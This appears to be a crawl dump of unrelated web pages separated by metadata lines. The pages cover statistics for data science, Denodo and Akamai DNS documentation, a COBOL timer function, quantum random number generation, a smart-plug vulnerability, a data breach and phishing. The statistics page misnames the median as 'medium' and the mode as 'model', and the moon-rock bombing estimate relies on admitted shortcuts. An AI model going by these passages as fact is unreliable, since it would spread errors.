Data Science is just like any other science requiring firstly to define a problem. Then collect and leverage data to counteract with solutions and test the solution if it's applicable on the given problem.
Importance of Statistics in Data Science
As we know that Data Science is the study of data in different forms to make healthy assumptions about behaviours and tendencies and to make these assumptions the information needs to be organised according to the concepts of statistics so that the study becomes easy and hence the findings become more accurate.
When the data is big and unorganised, statistics plays a powerful role in that situation. When a company uses statistics to find insights, it makes the tedious task look minimalist and easy in front of the big and buffer information that was provided earlier.
Statistics eradicate the unwanted information and catalogues the useful data in an effortless way making the humongous task of organising inputs seem so futile and serene.
Some ways in which Statistics helps in Data Science are:
Prediction and Classification: Statistics help in prediction and classification of data whether it would be right for the clients viewing by their previous usage of data.
Helps to create Probability Distribution and Estimation: Probability Distribution and Estimation are crucial in understanding the basics of machine learning and algorithms like logistic regressions.
Cross-validation and LOOCV techniques are also inherently statistical tools that have been brought into the Machine Learning and Data Analytics world for inference-based research, A/B and hypothesis testing.
Pattern Detection and Grouping: Statistics help in picking out the optimal data and weeding out the unnecessary dump of data for companies who like their work organised. It also helps spot out anomalies which further helps in processing the right data.
Powerful Insights: Dashboards, charts, reports and other data visualizations types in the form of interactive and effective representations give much more powerful insights than plain data and it also makes the data more readable and interesting.
Segmentation and Optimization: It also segments the data according to different kinds of demographic or psychographic factors that affect its processing. It also optimizes data in accordance with minimizing risk and maximizing outputs.
Apart from that, some of the statistical methods are also imperative approaches while analyzing complex data, some are discussed below.
Descriptive and Inferential Statistics for Data Analysis
There are 2 main categories in the statistics department-
Descriptive Statistics churns the data to provide a description of the population by relying on the characteristics of data providing parameters.
For eg- In a class, if we need to find average marks of a student in a test, in the descriptive analysis we would note the marks of every student in the class and then would note the highest marks obtained by a student, the lowest marks and the average of the class.
(Related read: Descriptive Statistics in R)
Types of statistics: Descriptive and inferential
Inferential Statistics makes predictions and assumptions regarding a large population by the trends prevalent in a sample taken from the same.
For eg. - In the recent past, many clinical trials have been done for the CoronaVirus vaccine and for the people are being chosen at random as a sample size from the immense population of different geographical locations.
Decoding the Descriptive Analysis
Whenever Descriptive Analysis is practised, it is always done around a central measurement which actually plays a huge role in determining the results. These central parameters are the Mean, Median and Mode.
Let’s throw some light on these measurements:
Measures of the Center
MEAN- Measure of an average of all the values in a sample is called Mean.
Eg.- If we need to find the mean of the marks obtained by the students of a class we will take the sum of all the marks and divide it by the total number of students.
MEDIUM- Measure of the central value of the sample set is called Median.
Eg.- if we need to find the medium of the marks obtained by the students of a class we will arrange them in ascending or descending order of marks and the value in the exact middle of the size taken will be considered its medium.
MODE- The value most recurrent in the sample set is known as Mode.
Eg.- if we need to find the model of the marks obtained by the students of a class we will see the most recurring marks that most of the students have received, and that will become the model of the class marks obtained.
Decoding the Inferential Statistics
Inferential Statistics is more prevalent in studying human nature and understanding the characteristics of the living. To analyse the trends of a general population, we take a random sample and study the properties of it. Then we test the findings, whether they comply with the general population accurately or not and then finally provide results with conclusive evidence.
Statisticians use hypothesis testing to formally check whether the hypothesis is accepted or rejected. Hypothesis testing is an Inferential Statistical technique used to determine whether the evidence stands tall in a data sample to infer that a certain condition complies with the entire population.
Statistical Data Analysis
Finding structures and making assumptions on it is the most predominant step of Statistical Data Analysis. Some useful Statistical Data Analysis Methods are:
As discussed above, Hypothesis Testing is one of the most important methods of analysis. Also, hypotheses are the natural links between underlying theory and statistics. Recurring usage of specific data in different tests allows the hypothesis to be more accurate.
(Most related: What is p-value in statistics?)
Classification is the most common method to define sub-populations from data. Now in the age of Big Data, it has become a necessity to look upon traditional methods such as Classification because the number of observations or the number of features tends to increase which makes the calculations too difficult.
Regression methods are the main tool to find global and local relationships between features when the target variable is measured. Simple Linear Regression is the most commonly used method for working within exponents. For more big data functional regression and quantile regression are used.
Time Series Analysis
Time series analysis is used to comprehend data and predict time intervals or temporal structure. Time series are very common in studies of observational data, and prediction is the most important challenge for such data. Its expertise is most commonly used in sectors of engineering, behavioural sciences, economics and natural sciences.
Nowadays it has become very hectic to even waste a minute on something not worth it and our lifestyles also reflect so. Everybody loves if their task is cut to the chase and is made viewer-friendly.
Statistics have been up to the task since it was discovered and now the people have actually understood how wonderful it is. It has made the life of many sectors easy and Data Science is one of these.
On the other side, data science is the rage of the new and without it, many supreme decisions could not have been possible. So, it would be safe to say we would not be where we are without Data Science and hence without Statistics. | <urn:uuid:db5ef35e-ad4d-49bd-8e08-9a2f0dd219b5> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/importance-statistics-data-science | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00740.warc.gz | en | 0.931184 | 1,900 | 3.203125 | 3 |
Creating Derived Views¶
This section describes how to create derived views based on the base views that retrieve data from different sources.
The following sections describe the process of creating the following types of views using our example to illustrate the process:
Union views: see section Creating Union Views
Join views: see section Creating Join Views
Selection views: see section Creating Selection Views
Flatten views: see section Creating Flatten Views
Intersect views: see section Creating Intersection Views
Minus views: see section Creating Minus Views
Interface views: see section Creating Interface Views
We will use the following example as a guide when describing the process:
Example: Unified data about customer sales and incidents.
A telecommunications company offers phone and internet services to its clients. Data on the incidents reported in the phone service are stored in a relational database, which is accessed through JDBC. In addition, data on the incidents reported in the Internet service are stored in another relational database also accessed through JDBC.
In our example, the director of the I.T department wants to monitor the number of incidents (either telephony or Internet) notified by the clients with the greatest sales volume to establish whether measures should be taken to increase client satisfaction.
Data on customer sales volumes are managed by another department of the company. That department provides a Web Service so the other departments can access to that data.
In this example, we will see how Virtual DataPort can be used to build a unified data view to meet the needs of the I.T department, by obtaining the total number of incidents from clients with the greatest sales volumes.
SQL scripts for creating the tables used in the examples of this manual (version for the MySQL, Oracle and PostgreSQL databases).
To follow the examples of this guide, use one of these scripts to create the required tables in a database.
A WSDL file with the description of the Web service used
VQL scripts (VQL stands for Virtual Query Language) that create the objects (data sources, views, stored procedures…) that we will learn to create in this manual. You do not need to use them if you are going to follow this guide. Otherwise, edit the VQL script that matches your database:
@HOSTNAMEwith the host name of your database.
CREATE WRAPPER JDBCstatements, change the parameter
RELATIONNAME, so it matches the name of the schema in your database. E.g. change | <urn:uuid:0cc981d7-3926-4737-b244-2d02dd05fd56> | CC-MAIN-2022-40 | https://community.denodo.com/docs/html/browse/latest/en/vdp/administration/creating_derived_views/creating_derived_views | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00740.warc.gz | en | 0.858178 | 562 | 2.78125 | 3 |
But the math checks out.
First of all, she probably got the idea from Heinlein's book The Moon is a Harsh Mistress where the rebel moon colonists do just that. I doubt she did her own math, and relied upon Heinlein to do it for her. But let's do the math ourselves.
Let's say that we want to stand at the height of the moon and drop a rock. How big a rock do we need to equal the energy of an atomic bomb? To make things simple, let's assume the size of bombs we want is that of the one dropped on Hiroshima.
As we know from high school physics, the energy of a dropped object (ignoring air) is:
energy = 0.5 * mass * velocity * velocitySolving for mass (the size of the rock), the equation is:
mass = 2 * energy/(velocity * velocity)We choose "energy" as that of an atomic bomb, but what is "velocity" in this equation, the speed of something dropped from the height of the moon?
The answer is something close to the escape velocity, which is defined as the speed of something dropped infinitely far away from the Earth. The moon isn't infinitely far away (only 250,000 miles away), but it's close.
How close? Well, let's use the formula for escape velocity from Wikipedia [*]:
where G is the "gravitational constant", M is the "mass of Earth", and r is the radius. Plugging in "radius of earth" and we get an escape velocity from the surface of the Earth of 11.18 km/s, which matches what Google tells us. Plugging in the radius of the moon's orbit, we get 1.44 km/s [*]. Thus, we get the following as the speed of an object dropped from the height of the moon to the surface of the earth, barring air resistance [*]:
9.74 km/sPlugging these numbers in gets the following result:
So the answer for the mass of the rock, dropped from the moon, to equal a Hiroshima blast, is 1.3 billion grams, or 1.3 million kilograms, or 1.3 thousand metric tons.
Well, that's a fine number and all, but what does that equal? Is that the size of Rhode Island? or just a big truck?
The answer is: nearly the same mass as the Space Shuttle during launch (2.03 million kilograms [*]). Or, a rock about 24 feet on a side.
That's big rock, but not so big that it's impractical, especially since things weigh 1/6th as on Earth. In Heinlein's books, instead of shooting rocks via rockets, it shot them into space using a railgun, magnetic rings. Since the moon doesn't have an atmosphere, you don't need to shoot things straight up. Instead, you can accelerate them horizontally across the moon's surface, to an escape velocity of 5,000 mph (escape velocity from moon's surface). As the moon's surface curves away, they'll head out into space (or toward Earth)
Thus, Elon Musk would need to:
- go the moon
- setup a colony, underground
- mine iron ore
- build a magnetic launch gun
- build fields full of solar panels for energy
- mine some rock
- cover it in iron (for magnet gun to hold onto)
- bomb earth
Update: I've made a number of short cuts, but I don't think they'll affect the math much.
We don't need escape velocity for the moon as a whole, just enough to reach the point where Earth's gravity takes over. On the other hand, we need to kill the speed of the Moons's orbit (2,000 miles per hour) in order to get down to Earth, or we just end up orbiting the Earth. I just assume the two roughly cancel each other out and ignore it.
I also ignore the atmosphere. Meteors from outer space hitting the earth of this size tend to disintegrate or blow up before reaching the surface. The Chelyabinsk meteor, the one in all those dashcam videos from 2013, was roughly 5 times the size of our moon rocks, and blew up in the atmosphere, high above the surface, with about 5 times the energy of a Hiroshima bomb. Presumably, we want our moon rocks to reach the surface, so they'll need some protection. Probably make them longer and thinner, and put an ablative heat shield up from, and wrap them in something strong like iron.
I don't know how much this will slow down the rock. Presumably, if coming straight down, it won't slow down by much, but if coming in at a steep angle (as meteors do), then it could slow down quite a lot.
Update: First version of this post used "height of moon", which Wolfram Alfa interpreted as "diameter of moon". This error was found by @hiergiltdiestfu. The current version of this post changes this to the correct value "radius of moon's orbit".
Update: I made a stupid error about Earth's gravitational strength at the height of the Moon's orbit. I've changed the equations to fix this. | <urn:uuid:519e6710-901f-455b-83fc-32fe58acabb5> | CC-MAIN-2022-40 | https://blog.erratasec.com/2017/02/some-moon-math.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00140.warc.gz | en | 0.935822 | 1,086 | 3.328125 | 3 |
A DNS zone is a distinct portion or administrative space in the DNS domain name space that is hosted by a DNS server. DNS zones allow the DNS name space to be divided up for administration and for redundancy. The DNS server can be authoritative for multiple DNS zones.
All of the information for a zone is stored in a DNS zone file, which contains the DNS database records for all of the names within that zone. These records contain the mapping between an IP address and a DNS name. DNS zone files must always start with a Start of Authority (SOA) record, which contains important administrative information about that zone and about other DNS records.
You can implement Edge DNS as your primary or secondary DNS, either replacing or augmenting your existing DNS infrastructure as desired.
Whether primary or secondary, Edge DNS can provide your organization with a scalable and secure DNS network that helps ensure the best possible experience for your users. The available zone modes are:
- Primary mode. In primary mode, customers manage zones using either Akamai Control Center or the Edge DNS Zone Management API. The Edge DNS zone transfer agent pushes out your zone data to the Edge DNS name servers and provides you a list of name servers that you can register with your domain registrar.
- Secondary mode. In secondary mode, customers enable DNS zone transfers from their primary name servers to Akamai. Edge DNS name servers use authoritative transfer (AXFR) as the DNS zone transfer method for secondary zones. However, if you configured your own master names servers to support incremental zone transfers (IXFR), the Edge DNS zone transfer agents (ZTAs) will automatically do incremental zone transfer for secondary zones.
In secondary mode, you maintain zone information on your primary (master) name server, and Edge DNS zone ZTAs perform zone transfers from the primary name servers and upload these zones to Akamai name servers. ZTAs conform to the standard protocols described in RFCs 1034 and 1035 and work with most common primary name servers in use, including Internet Systems Consortium's BIND (version 9 and later), and also Microsoft Windows Server and Microsoft DNS operating systems.
Refresh and retry intervals in the start of authority (SOA) determine the interval between zone transfers. In addition, you can configure the system to accept NOTIFY requests from your primaries to allow almost immediate updates.
ZTAs are deployed in a redundant configuration across multiple physical and network locations throughout the Akamai network. All ZTAs will attempt to perform zone transfers from your master name servers, but only one (usually the first one that receives an update using one transfer) will send any given zone update to the name servers. This process uses a proprietary fault-tolerant data transfer infrastructure, thus providing a fault-tolerant system at every level.
Cross-account subzone delegation provides a mechanism for a parent zone owner to securely grant another Edge DNS account the capability to delegate subzones on the owner's existing zones. The zone owner participating in subzone grant requests needs to have their Edge DNS contract authorized for subzone grants. Contact your service representative for authorization.
After a service representative adds a zone owner's contract to the allow list, the zone owner can enable subzone delegation on a specified zone. Enabling subzone creation permits any Akamai customer to submit a subzone request on this zone.
Without an approved subzone grant request, every subzone starts in a PENDING_APPROVAL state. The subzone owner can begin building up records and uploading zone files while they wait for approval of their request from the zone owner. The zone owner is notified of any pending subzone requests and either approves or rejects them during the review process.
Zone apex mapping uses the mapping data available on the Akamai platform to reduce DNS lookup times for your websites.
With zone apex mapping, name servers resolve DNS lookup requests with the IP address of an optimal edge server. Resolving lookups in this way helps you:
- Eliminate the CNAME chains inherent with CDN solutions
- Reduce DNS lookup times for any website on the Akamai platform
- Deploy Akamai acceleration solutions for records at the zone apex for which a CNAME cannot otherwise be used
You use the AKAMAICDN private resource record type to configure zone apex mapping.
The DNS security extensions (DNSSEC), described in RFCs 4033, 4034, and 4035, allow zone administrators to digitally sign zone data using public key cryptography, proving their authenticity. The primary idea behind DNSSEC is to prevent DNS cache poisoning and DNS hijacking. These record types are used for DNSSEC:
- DNSKEY (DNS public key). Stores the public key used for resource record set signatures.
- RRSIG (resource record signature). Stores the signature for a resource record set (RRset).
- DS (delegation signer). Parent zone pointer to a child zone's DNSKEY.
- NSEC3 (next secure v3). Used for authenticated NXDOMAIN.
The Security Option contract item of Edge DNS supports these features:
- DNSSEC "sign and serve". Akamai manages signing the zone, key rotation, and serving the zone.
- DNSSEC "serve". You manage signing the zone and key rotation, while Akamai serves the zone.
The DNSSEC sign and serve feature provides the ability to offload the DNSSEC support entirely to Akamai's existing key management infrastructure (KMI) for the zone signing key (ZSK) and key signing key (KSK) rotation.
The ZSK is rotated weekly and the KSK is rotated annually. For zone key rotation, Akamai uses RFC 4641's
prepublish key rollover method, modified for constant rotation. That is, two ZSKs are present in the zone apex DNSKEY record. One key actively signs the rest of the zone, while the other key is present so it has time to propagate before becoming active. This method:
- Introduces a new, as of yet unused, DNSKEY record into the apex DNSKEY RRset.
- Waits for the data to propagate (propagation time plus keyset TTL).
- Switches to signing the zone's RRSIGs with the new key, but leaving the previous key available in the apex DNSKEY RRset.
- Waits for propagation time plus maximum TTL in the zone.
- Removes the old key from the apex DNSKEY RRset, which will then restart the key rotation process.
Signature duration is three days. To be sure signatures don't reach expiration, even if records are not being modified, the zone is re-signed at least once per day.
An added benefit of DNSSEC sign and serve is the ability to support top-level redirection. The current recommended algorithm is ECDSA-P256-SHA256, or RSA SHA-256 if you want to avoid the use of ECDSA.
DNSSEC can be used with both ZAM and top-level redirection.
The DNSSEC serve feature provides the ability to support DNSSEC for secondary zones, but the zone administrator is responsible for implementing their own key management infrastructure (KMI) solution and properly rotating their zone signing key (ZSK) and key signing key (KSK).
DNSSEC requires transaction signature (TSIG). For zone access control, you need to enable TSIG with the supported algorithms. In addition to your responsibility for all of the key signing, you must ensure that all the necessary new records are in the zone transfer to Akamai.
Subset RRsets of self-signed zones not served
If you have a self-signed zone, Edge DNS won't serve subset RRsets. It will serve the full RRset as defined in your zone. If the RRset is too large for the standard DNS packet size, your end users' caching name servers will need to negotiate a larger packet size with extension mechanisms for DNS (EDNS0), or else use TCP. If you're concerned about end users' name servers not having this functionality, configure smaller RRsets in your zone.
An alias zone is a zone type that does not have its own zone file. Instead, it bases itself on another Edge DNS (base) zone's (either primary or secondary) resource records. In other words, the zone data is a copy of another Edge DNS zone. You can modify data in alias zones by changing the "parent" or "alias-of" zone.
An organization may have several hundred vanity or brand domains that need to be registered and for which DNS services are required, but for which DNS is configured identically to a base zone. In these cases you can configure one base zone, point many aliases to the base zone, and easily manage any DNS changes by updating only the base zone file.
Default limit for contracts is 2,000
By default, Edge DNS contracts are limited to 2,000 configured zones, including aliases. Contact technical support if you need to exceed this limit.
Alias zones generate their own log lines independent of their base zone. To receive logs with alias zone traffic, you need to enable log delivery for each alias zone individually.
Alias zones are compatible with:
- Zone apex mapping
- Top-level CNAME (Can only be configured by technical support.)
- Vanity name servers (These name server records should not be from a base zone with aliases.)
When using these features, pay attention before adding alias zones. Check the property receiving the traffic in Akamai Property Manager, ensuring that the appropriate hostnames are configured and that the correct redirects are set up. If HTTPS support is required, make sure that the certificates are configured correctly. With a certificate that supports subject alternative names (SAN), this typically means adding the domain apex to the certificate.
Alias zones are not compatible with DNSSEC. Each DNSSEC zone requires its own resource record signatures. Base zones with DNSSEC enabled can't have any aliases.
This example is displayed in standard BIND zone format.
example-base-zone.com base zone has the following resource records:
|Zone name||TTL||Record class||Record type||Record data|
example-alias-zone.com zone is configured as an alias of
www.example-base-zone.com. Any time a DNS request asks for resolution of a resource record in the alias zone, Edge DNS will answer with the resource records specified in the base zone, as if the alias zone had the same resource records as the base zone.
|Zone name||TTL||Record class||Record type||Record data|
Any time a change is made to the base zone's resource records, all the aliases of that zone will reflect the same change.
When configured on Edge DNS, alias zones receive traffic like any other zone and are counted as regular zones from a billing standpoint.
For example, if a Edge DNS contract allows for 50 zones, and 20 regular zones and 30 alias zones are configured, then these 50 zones will be within the contract entitlement. If 5 additional alias zones are configured, then the total of 55 zones will incur a 5 zone overage based on the per-zone overage rate.
Edge DNS supports the Internet (IN) class and the following record types.
- A. IPv4 address.
- AAAA. IPv6 address.
- AFSDB. AFS database.
- AKAMAICDN. Akamai private resource record for zone apex mapping.
- AKAMAITLC. Akamai private resource record for top-level CNAME. Can be configured only by technical support. Akamai recommends using AKAMAICDN instead.
- CAA. Certification authority authorization.
- CERT. Certificate record that stores public key certificates.
- CDNSKEY. Child copy of the DNSKEY record, for transfer to parent. To add record sets of this type, use the Edge DNS Zone Management API.
- CDS. Child copy of the DS record, for transfer to parent. To add record sets of this type, use the Edge DNS Zone Management API.
- CNAME. Canonical name.
- DNSKEY. DNS key. Stores the public key used for RRset signatures. Required for DNS security extensions (DNSSEC).
- DS. Delegation signer. Parent zone pointer to a child zone's DNSKEY. Required for DNSSEC.
- HINFO. System information.
- HTTPS. Hypertext Transfer Protocol Secure.
- LOC. Location.
- MX. Mail exchange.
- NAPTR. Naming authority pointer.
- NS. Name server.
- NSEC. Next secure. Available for self-signed secondary zones only. NSEC3 is a better choice.
- NSEC3. Next secure, version 3. Used for authenticated NXDOMAIN. Required for DNSSEC.
- NSEC3PARAM. NSEC3 parameters.
- PTR. Pointer.
- RP. Responsible person.
- RRSIG. Resource record set (RRset) signature. Stores the digital signature used to authenticate data that is in the signed RRset. Required for DNSSEC.
- SSHFP. Secure shell fingerprint record. Identifies SSH keys that are associated with a host name.
- SOA. Start of authority record. Stores administrative information about a zone, including data to control zone transfers. To add record sets of this type, use the Edge DNS Zone Management API.
- SPF. Sender policy framework.
- SRV. Service locator.
- SVCB. Service bind.
- TLSA. Transport Layer Security Authentication certificate association. Used to associate a TLS server certificate or public key with the domain name where the record is found.
- TXT. Text.
- ZONEMD. Message digests for DNS zones. To add record sets of this type, use the Edge DNS Zone Management API.
Updated 11 months ago | <urn:uuid:89a2253d-80bc-4e57-955c-545d1a0677c8> | CC-MAIN-2022-40 | https://techdocs.akamai.com/edge-dns/docs/features | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00140.warc.gz | en | 0.828941 | 3,086 | 2.8125 | 3 |
The INTERVAL-TIMER function returns the number of seconds starting from an arbitrary point in time. Typically, you will want to use the function twice or more in order to take differences between the return values in order to time something.
Another potential use would be to obtain a higher-resolution timestamp to distinguish items with identical keys.
The return value is not an integer. The exact precision varies widely between systems, but should be at minimum one microsecond (higher for most machines). A variable with at least four digits after the decimal point is recommended to hold the result (though that is not required). Floating point would also be a recommended variable type.
The return value by itself has no preset meaning; it is just an arbitrary number of seconds, measuring real time (as opposed to CPU-only time). Compare it to a second return value for meaning. If the host system does not have an appropriate timer available, then the function will always return a value of zero.
Normally, the timer will only increase in value for any one process. In some implementations, the timer may reset to zero at midnight.
The following example shows how, by setting an arbitrary starting point (the result of the something-long section), you can use the interval-timer function to measure time elapsed.
working-storage section. 77 start-time double. 77 elapsed-time double. 77 display-time pic zzzz.9(4). 77 dummy pic 9(3)9(6). procedure division. main-logic. display standard window. display "Running..." move function interval-timer to start-time perform something-long compute elapsed-time = function interval-timer - start-time move elapsed-time to display-time display "Something-Long took ", display-time, " seconds to run" accept omitted. stop run. something-long. perform 1000000 times compute dummy = function sqrt(123) end-perform. | <urn:uuid:87daa6f7-7366-4893-afe2-f1a04cbe2a35> | CC-MAIN-2022-40 | https://www.microfocus.com/documentation/extend-acucobol/1031/extend-Interoperability-Suite/GUID-AF738869-E5FB-424E-AD44-D25396D4F2A2.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00140.warc.gz | en | 0.867514 | 411 | 3.578125 | 4 |
The importance of randomness in a quantum world
Quantum computing has the power to revolutionise the world we live in, but like all technology it can be used for harm as well as good. Quantum cybersecurity is becoming a necessity for all those who value the integrity and security of their data.
In its latest report looking at quantum computing, the IBM Institute for Business Value highlights the potential quantum technologies have to become ‘a double-edged sword’; one that will expand computing power and offer opportunities for improving cybersecurity, whilst exposing vulnerabilities in current encryption methods.
IBM reference the risks posed to both symmetric-key cryptography (where the same key is used to encrypt and decrypt data) and asymmetric aka Public Key cryptography (where two different, but related, keys are used).
With the long-term security of current cryptographic methods in doubt, enterprises and governments alike are investing in the development of new, quantum-safe cryptographic solutions. Two of these technologies Quantum Random Number Generation (QRNG) and Quantum Key Distribution (QKD) leverage the principles of quantum physics to counter the emerging threat of the quantum computer.
The importance of randomness
Randomness (entropy) is the cornerstone of cryptography as it is used to generate session keys. The more random the numbers, the more secure the cryptographic system. The challenge then, becomes one of generating true randomness.
Many of today’s systems use pseudo-random number generation. However, these systems are vulnerable as they rely upon external sources of entropy and do not generate truly random numbers. Software-based random number generators (RNGs) are deterministic and do not provide true randomness.
Hardware-based RNGs that exploit the principles of classical physics provide a greater degree of entropy, but even these are susceptible to influence and lack true randomness. Whilst these patterns are almost impossible for classical computers to recognise, the same cannot be said for a quantum computer.
For genuine entropy, cryptographers are turning to quantum random number generation (QRNG). These hardware-based systems exploit the principles of quantum physics to generate truly random numbers and offer greater resistance to external or environmental perturbation.
“Quantum Random Number Generators (QRNGs) can be thought of as a special case of TRNGs in which the data is the result of quantum events. But unlike traditional TRNGs, QRNGs promise truly random numbers by exploiting the inherent randomness in quantum physics. A true random number generator provides the highest level of security because the number generated is impossible to guess.” – IBM Institute for Business Value
Provable forward secrecy
Quantum has a role to play beyond key generation. The principle of “observation causes perturbation” is an essential component in forward secrecy. Although the IBM report doesn’t address quantum key distribution (QKD), it is an important part of the quantum-safe cryptography story.
To “eavesdrop” on a communication, any unauthorised third party will need to observe the key in a quantum state. This act of observation introduces detectable anomalies, alerting the system to the breach. QKD is already being used in real-world applications, working in conjunction with symmetric key cryptography to provide provable forward secrecy.
Data security for the present and future
With the impending arrival of mainstream quantum computers, QRNG and QKD are two technologies that security-aware organisations should be considering if they are to ensure the long-term protection of their data.
Although it may be tempting to delay change until a viable quantum computer becomes available, the quantum threat is just as relevant today. The long-term value of much of the data transmitted across high-speed networks means a patient cyber-criminal can capture the data today and decrypt it later.
“Even though large-scale quantum computers are not yet commercially available, initiating quantum cybersecurity solutions now has significant advantages. For example, a malicious entity can capture secure communications of interest today. Then, when large-scale quantum computers are available, that vast computing power could be used to break the encryption and learn about those communications.” – IBM Institute for Business Value
Four steps to take now
- Identify, retain and recruit for the necessary quantum cybersecurity skills. These people will become the organisation’s cybersecurity champions; collaborating with standards bodies and creating its quantum security transition plan
- Begin to identify where quantum-safe security methods should be adopted by assessing potential areas of security exposure
- Keep up-to-date with news and advances in quantum-safe cybersecurity standards and emergence of security solutions
- Work with encryption solution providers to deploy quantum-safe solutions
Like to find out more about Quantum Random Number Generation? Download our White Paper: What is the Q in QRNG? | <urn:uuid:dc2f9104-3b08-4e92-8afa-9d35e7e4e35f> | CC-MAIN-2022-40 | https://www.idquantique.com/the-importance-of-randomness-in-a-quantum-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00140.warc.gz | en | 0.895232 | 985 | 2.890625 | 3 |
*This blog is originally from August 2018 and was updated April 2019*
From connected baby monitors to smart speakers — IoT devices are becoming commonplace in modern homes. Their convenience and ease of use make them seem like the perfect gadgets for the whole family. However, users can be prone to putting basic security hygiene on the backburner when they get a shiny new IoT toy, such as applying security updates, using complex passwords for home networks and devices, and isolating critical devices or networks from IoT. Additionally, IoT devices’ poor security standards make them conveniently flawed for someone else: cybercriminals, as hackers are constantly tracking flaws which they can weaponize. When a new IoT device is put on the market, these criminals have a new opportunity to expose the device’s weaknesses and access user networks. As a matter of fact, our McAfee Labs Advanced Threat Research team uncovered a flaw in one of these IoT devices: the Wemo Insight Smart Plug, which is a Wi-Fi–connected electric outlet.
Once our research team figured out how exactly the device was vulnerable, they leveraged the flaw to test out a few types of cyberattacks. The team soon discovered an attacker could leverage this vulnerability to turn off or overload the switch, which could overheat circuits or turn a home’s power off. What’s more – this smart plug, like many vulnerable IoT devices, creates a gateway for potential hackers to compromise an entire home Wi-Fi network. In fact, using the Wemo as a sort of “middleman,” our team leveraged this open hole in the network to power a smart TV on and off, which was just one of the many things that could’ve been possibly done.
And as of April 2019, the potential of a threat born from this vulnerability seems as possible as ever. Our ATR team even has reason to believe that cybercriminals already have or are currently working on incorporating the unpatched Wemo Insight vulnerability into IoT malware. IoT malware is enticing for cybercriminals, as these devices are often lacking in their security features. With companies competing to get their versions of the latest IoT device on the market, important cybersecurity features tend to fall by the wayside. This leaves cybercriminals with plenty of opportunities to expose device flaws right off the bat, creating more sophisticated cyberattacks that evolve with the latest IoT trends.
Now, our researchers have reported this vulnerability to Belkin, and, almost a year after initial disclosure, are awaiting a follow-up. However, regardless if you’re a Wemo user or not, it’s still important you take proactive security steps to safeguard all your IoT devices. Start by following these tips:
- Keep security top of mind when buying an IoT device. When you’re thinking of making your next IoT purchase, make sure to do your research first. Start by looking up the device in question’s security standards. A simple Google search on the product, as well as the manufacturer, will often do the trick.
- Change default passwords and do an update right away. If you purchase a connected device, be sure to first and foremost change the default password. Default manufacturer passwords are rather easy for criminals to crack. Also, your device’s software will need to be updated at some point. In a lot of cases, devices will have updates waiting from them as soon as they’re taken out of the box. The first time you power up your device, you should check to see if there are any updates or patches from the manufacturer.
- Keep your firmware up-to-date. Manufacturers often release software updates to protect against these potential vulnerabilities. Set your device to auto-update, if you can, so you always have the latest software. Otherwise, just remember to consistently update your firmware whenever an update is available.
- Secure your home’s internet at the source. These smart home devices must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose your network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:ff1002a9-ef87-49d5-bd48-da658cea5a72> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/consumer/consumer-threat-reports/wemo-vulnerability | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00140.warc.gz | en | 0.945248 | 897 | 2.65625 | 3 |
Each year, the number of cyberattacks that result in data breaches grows higher. Recently, the daily deals site LivingSocial suffered a massive cyberattack that resulted in a data breach impacting 50 million customers. The company is requiring all users to reset their passwords in case they have been compromised. LivingSocial said that customer credit card information was not stolen because it was stored in a separate database, adding that although customer passwords were taken, they were encrypted and scrambled, so might not be useable.
“Although your LivingSocial password would be difficult to decode, we want to take every precaution to ensure that your account is secure, so we are expiring your old password and requesting that you create a new one,” LivingSocial CEO Tim O’Shaughnessy said in an email.
How does this impact customers?
Although the company said customers shouldn’t be concerned about the broader implications of this breach, some IT analysts pointed out that the hackers still made off with personal information about customers, like addresses, emails, birth dates and other data. Once decrypted, it could be used for nefarious purposes, like trying to steal someone’s identity. Customers who use the same password across multiple sites could also find attackers trying to break into their other accounts.
Another concern is that the hacker could use the email address and name from an account to send out a phishing attack. Cyberthieves could send an email that appears to be legitimate and from a real company and trick users into submitting passwords, financial data or other confidential information.
“[They could] send out millions of emails saying they’re LivingSocial, and get users to change their passwords,” said one security researcher. “The biggest risk to people is clicking a link in an email.”
Cybersecurity best practices
This incident underlines the importance of being cautious about where confidential information is stored. Any data that is entered onto a public computer should be erased entirely so that it is not usable or accessible to others. Some software can erase information stored on public computers in business settings, schools, libraries or other facilities.
It’s also critical that users follow best practices when it comes to internet safety, checking that emails are from legitimate sources and using strong passwords that vary across different sites. As these kinds of breaches become more common, only smart and proactive behavior will help individuals remain ahead of these kinds of problems.
What are other ways that users can protect themselves from cyberattacks and these kinds of issues? Please share your thoughts below. | <urn:uuid:98046984-14f0-4e91-91a0-dfa29a05342a> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/livingsocial-hacked-account-passwords-stolen | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00341.warc.gz | en | 0.949175 | 525 | 2.828125 | 3 |
One of the most common social engineering attacks is phishing. Phishing is an attempt to access sensitive information through electronic communication. This is familiar to most people in the form of the stereotypical “Nigerian prince” email. The email promises money in exchange for help, but in order to receive the money, the user must provide account information.
Those types of clichés are so well-known that they (probably) never work anymore. Instead of targeting individual email accounts, phishing attempts are now targeting corporations. There is not only more at stake, but there is also the chance that a person dedicated to providing good customer service will be especially responsive to a scammer or be overwhelmed with work to the point that they respond quickly without thinking.
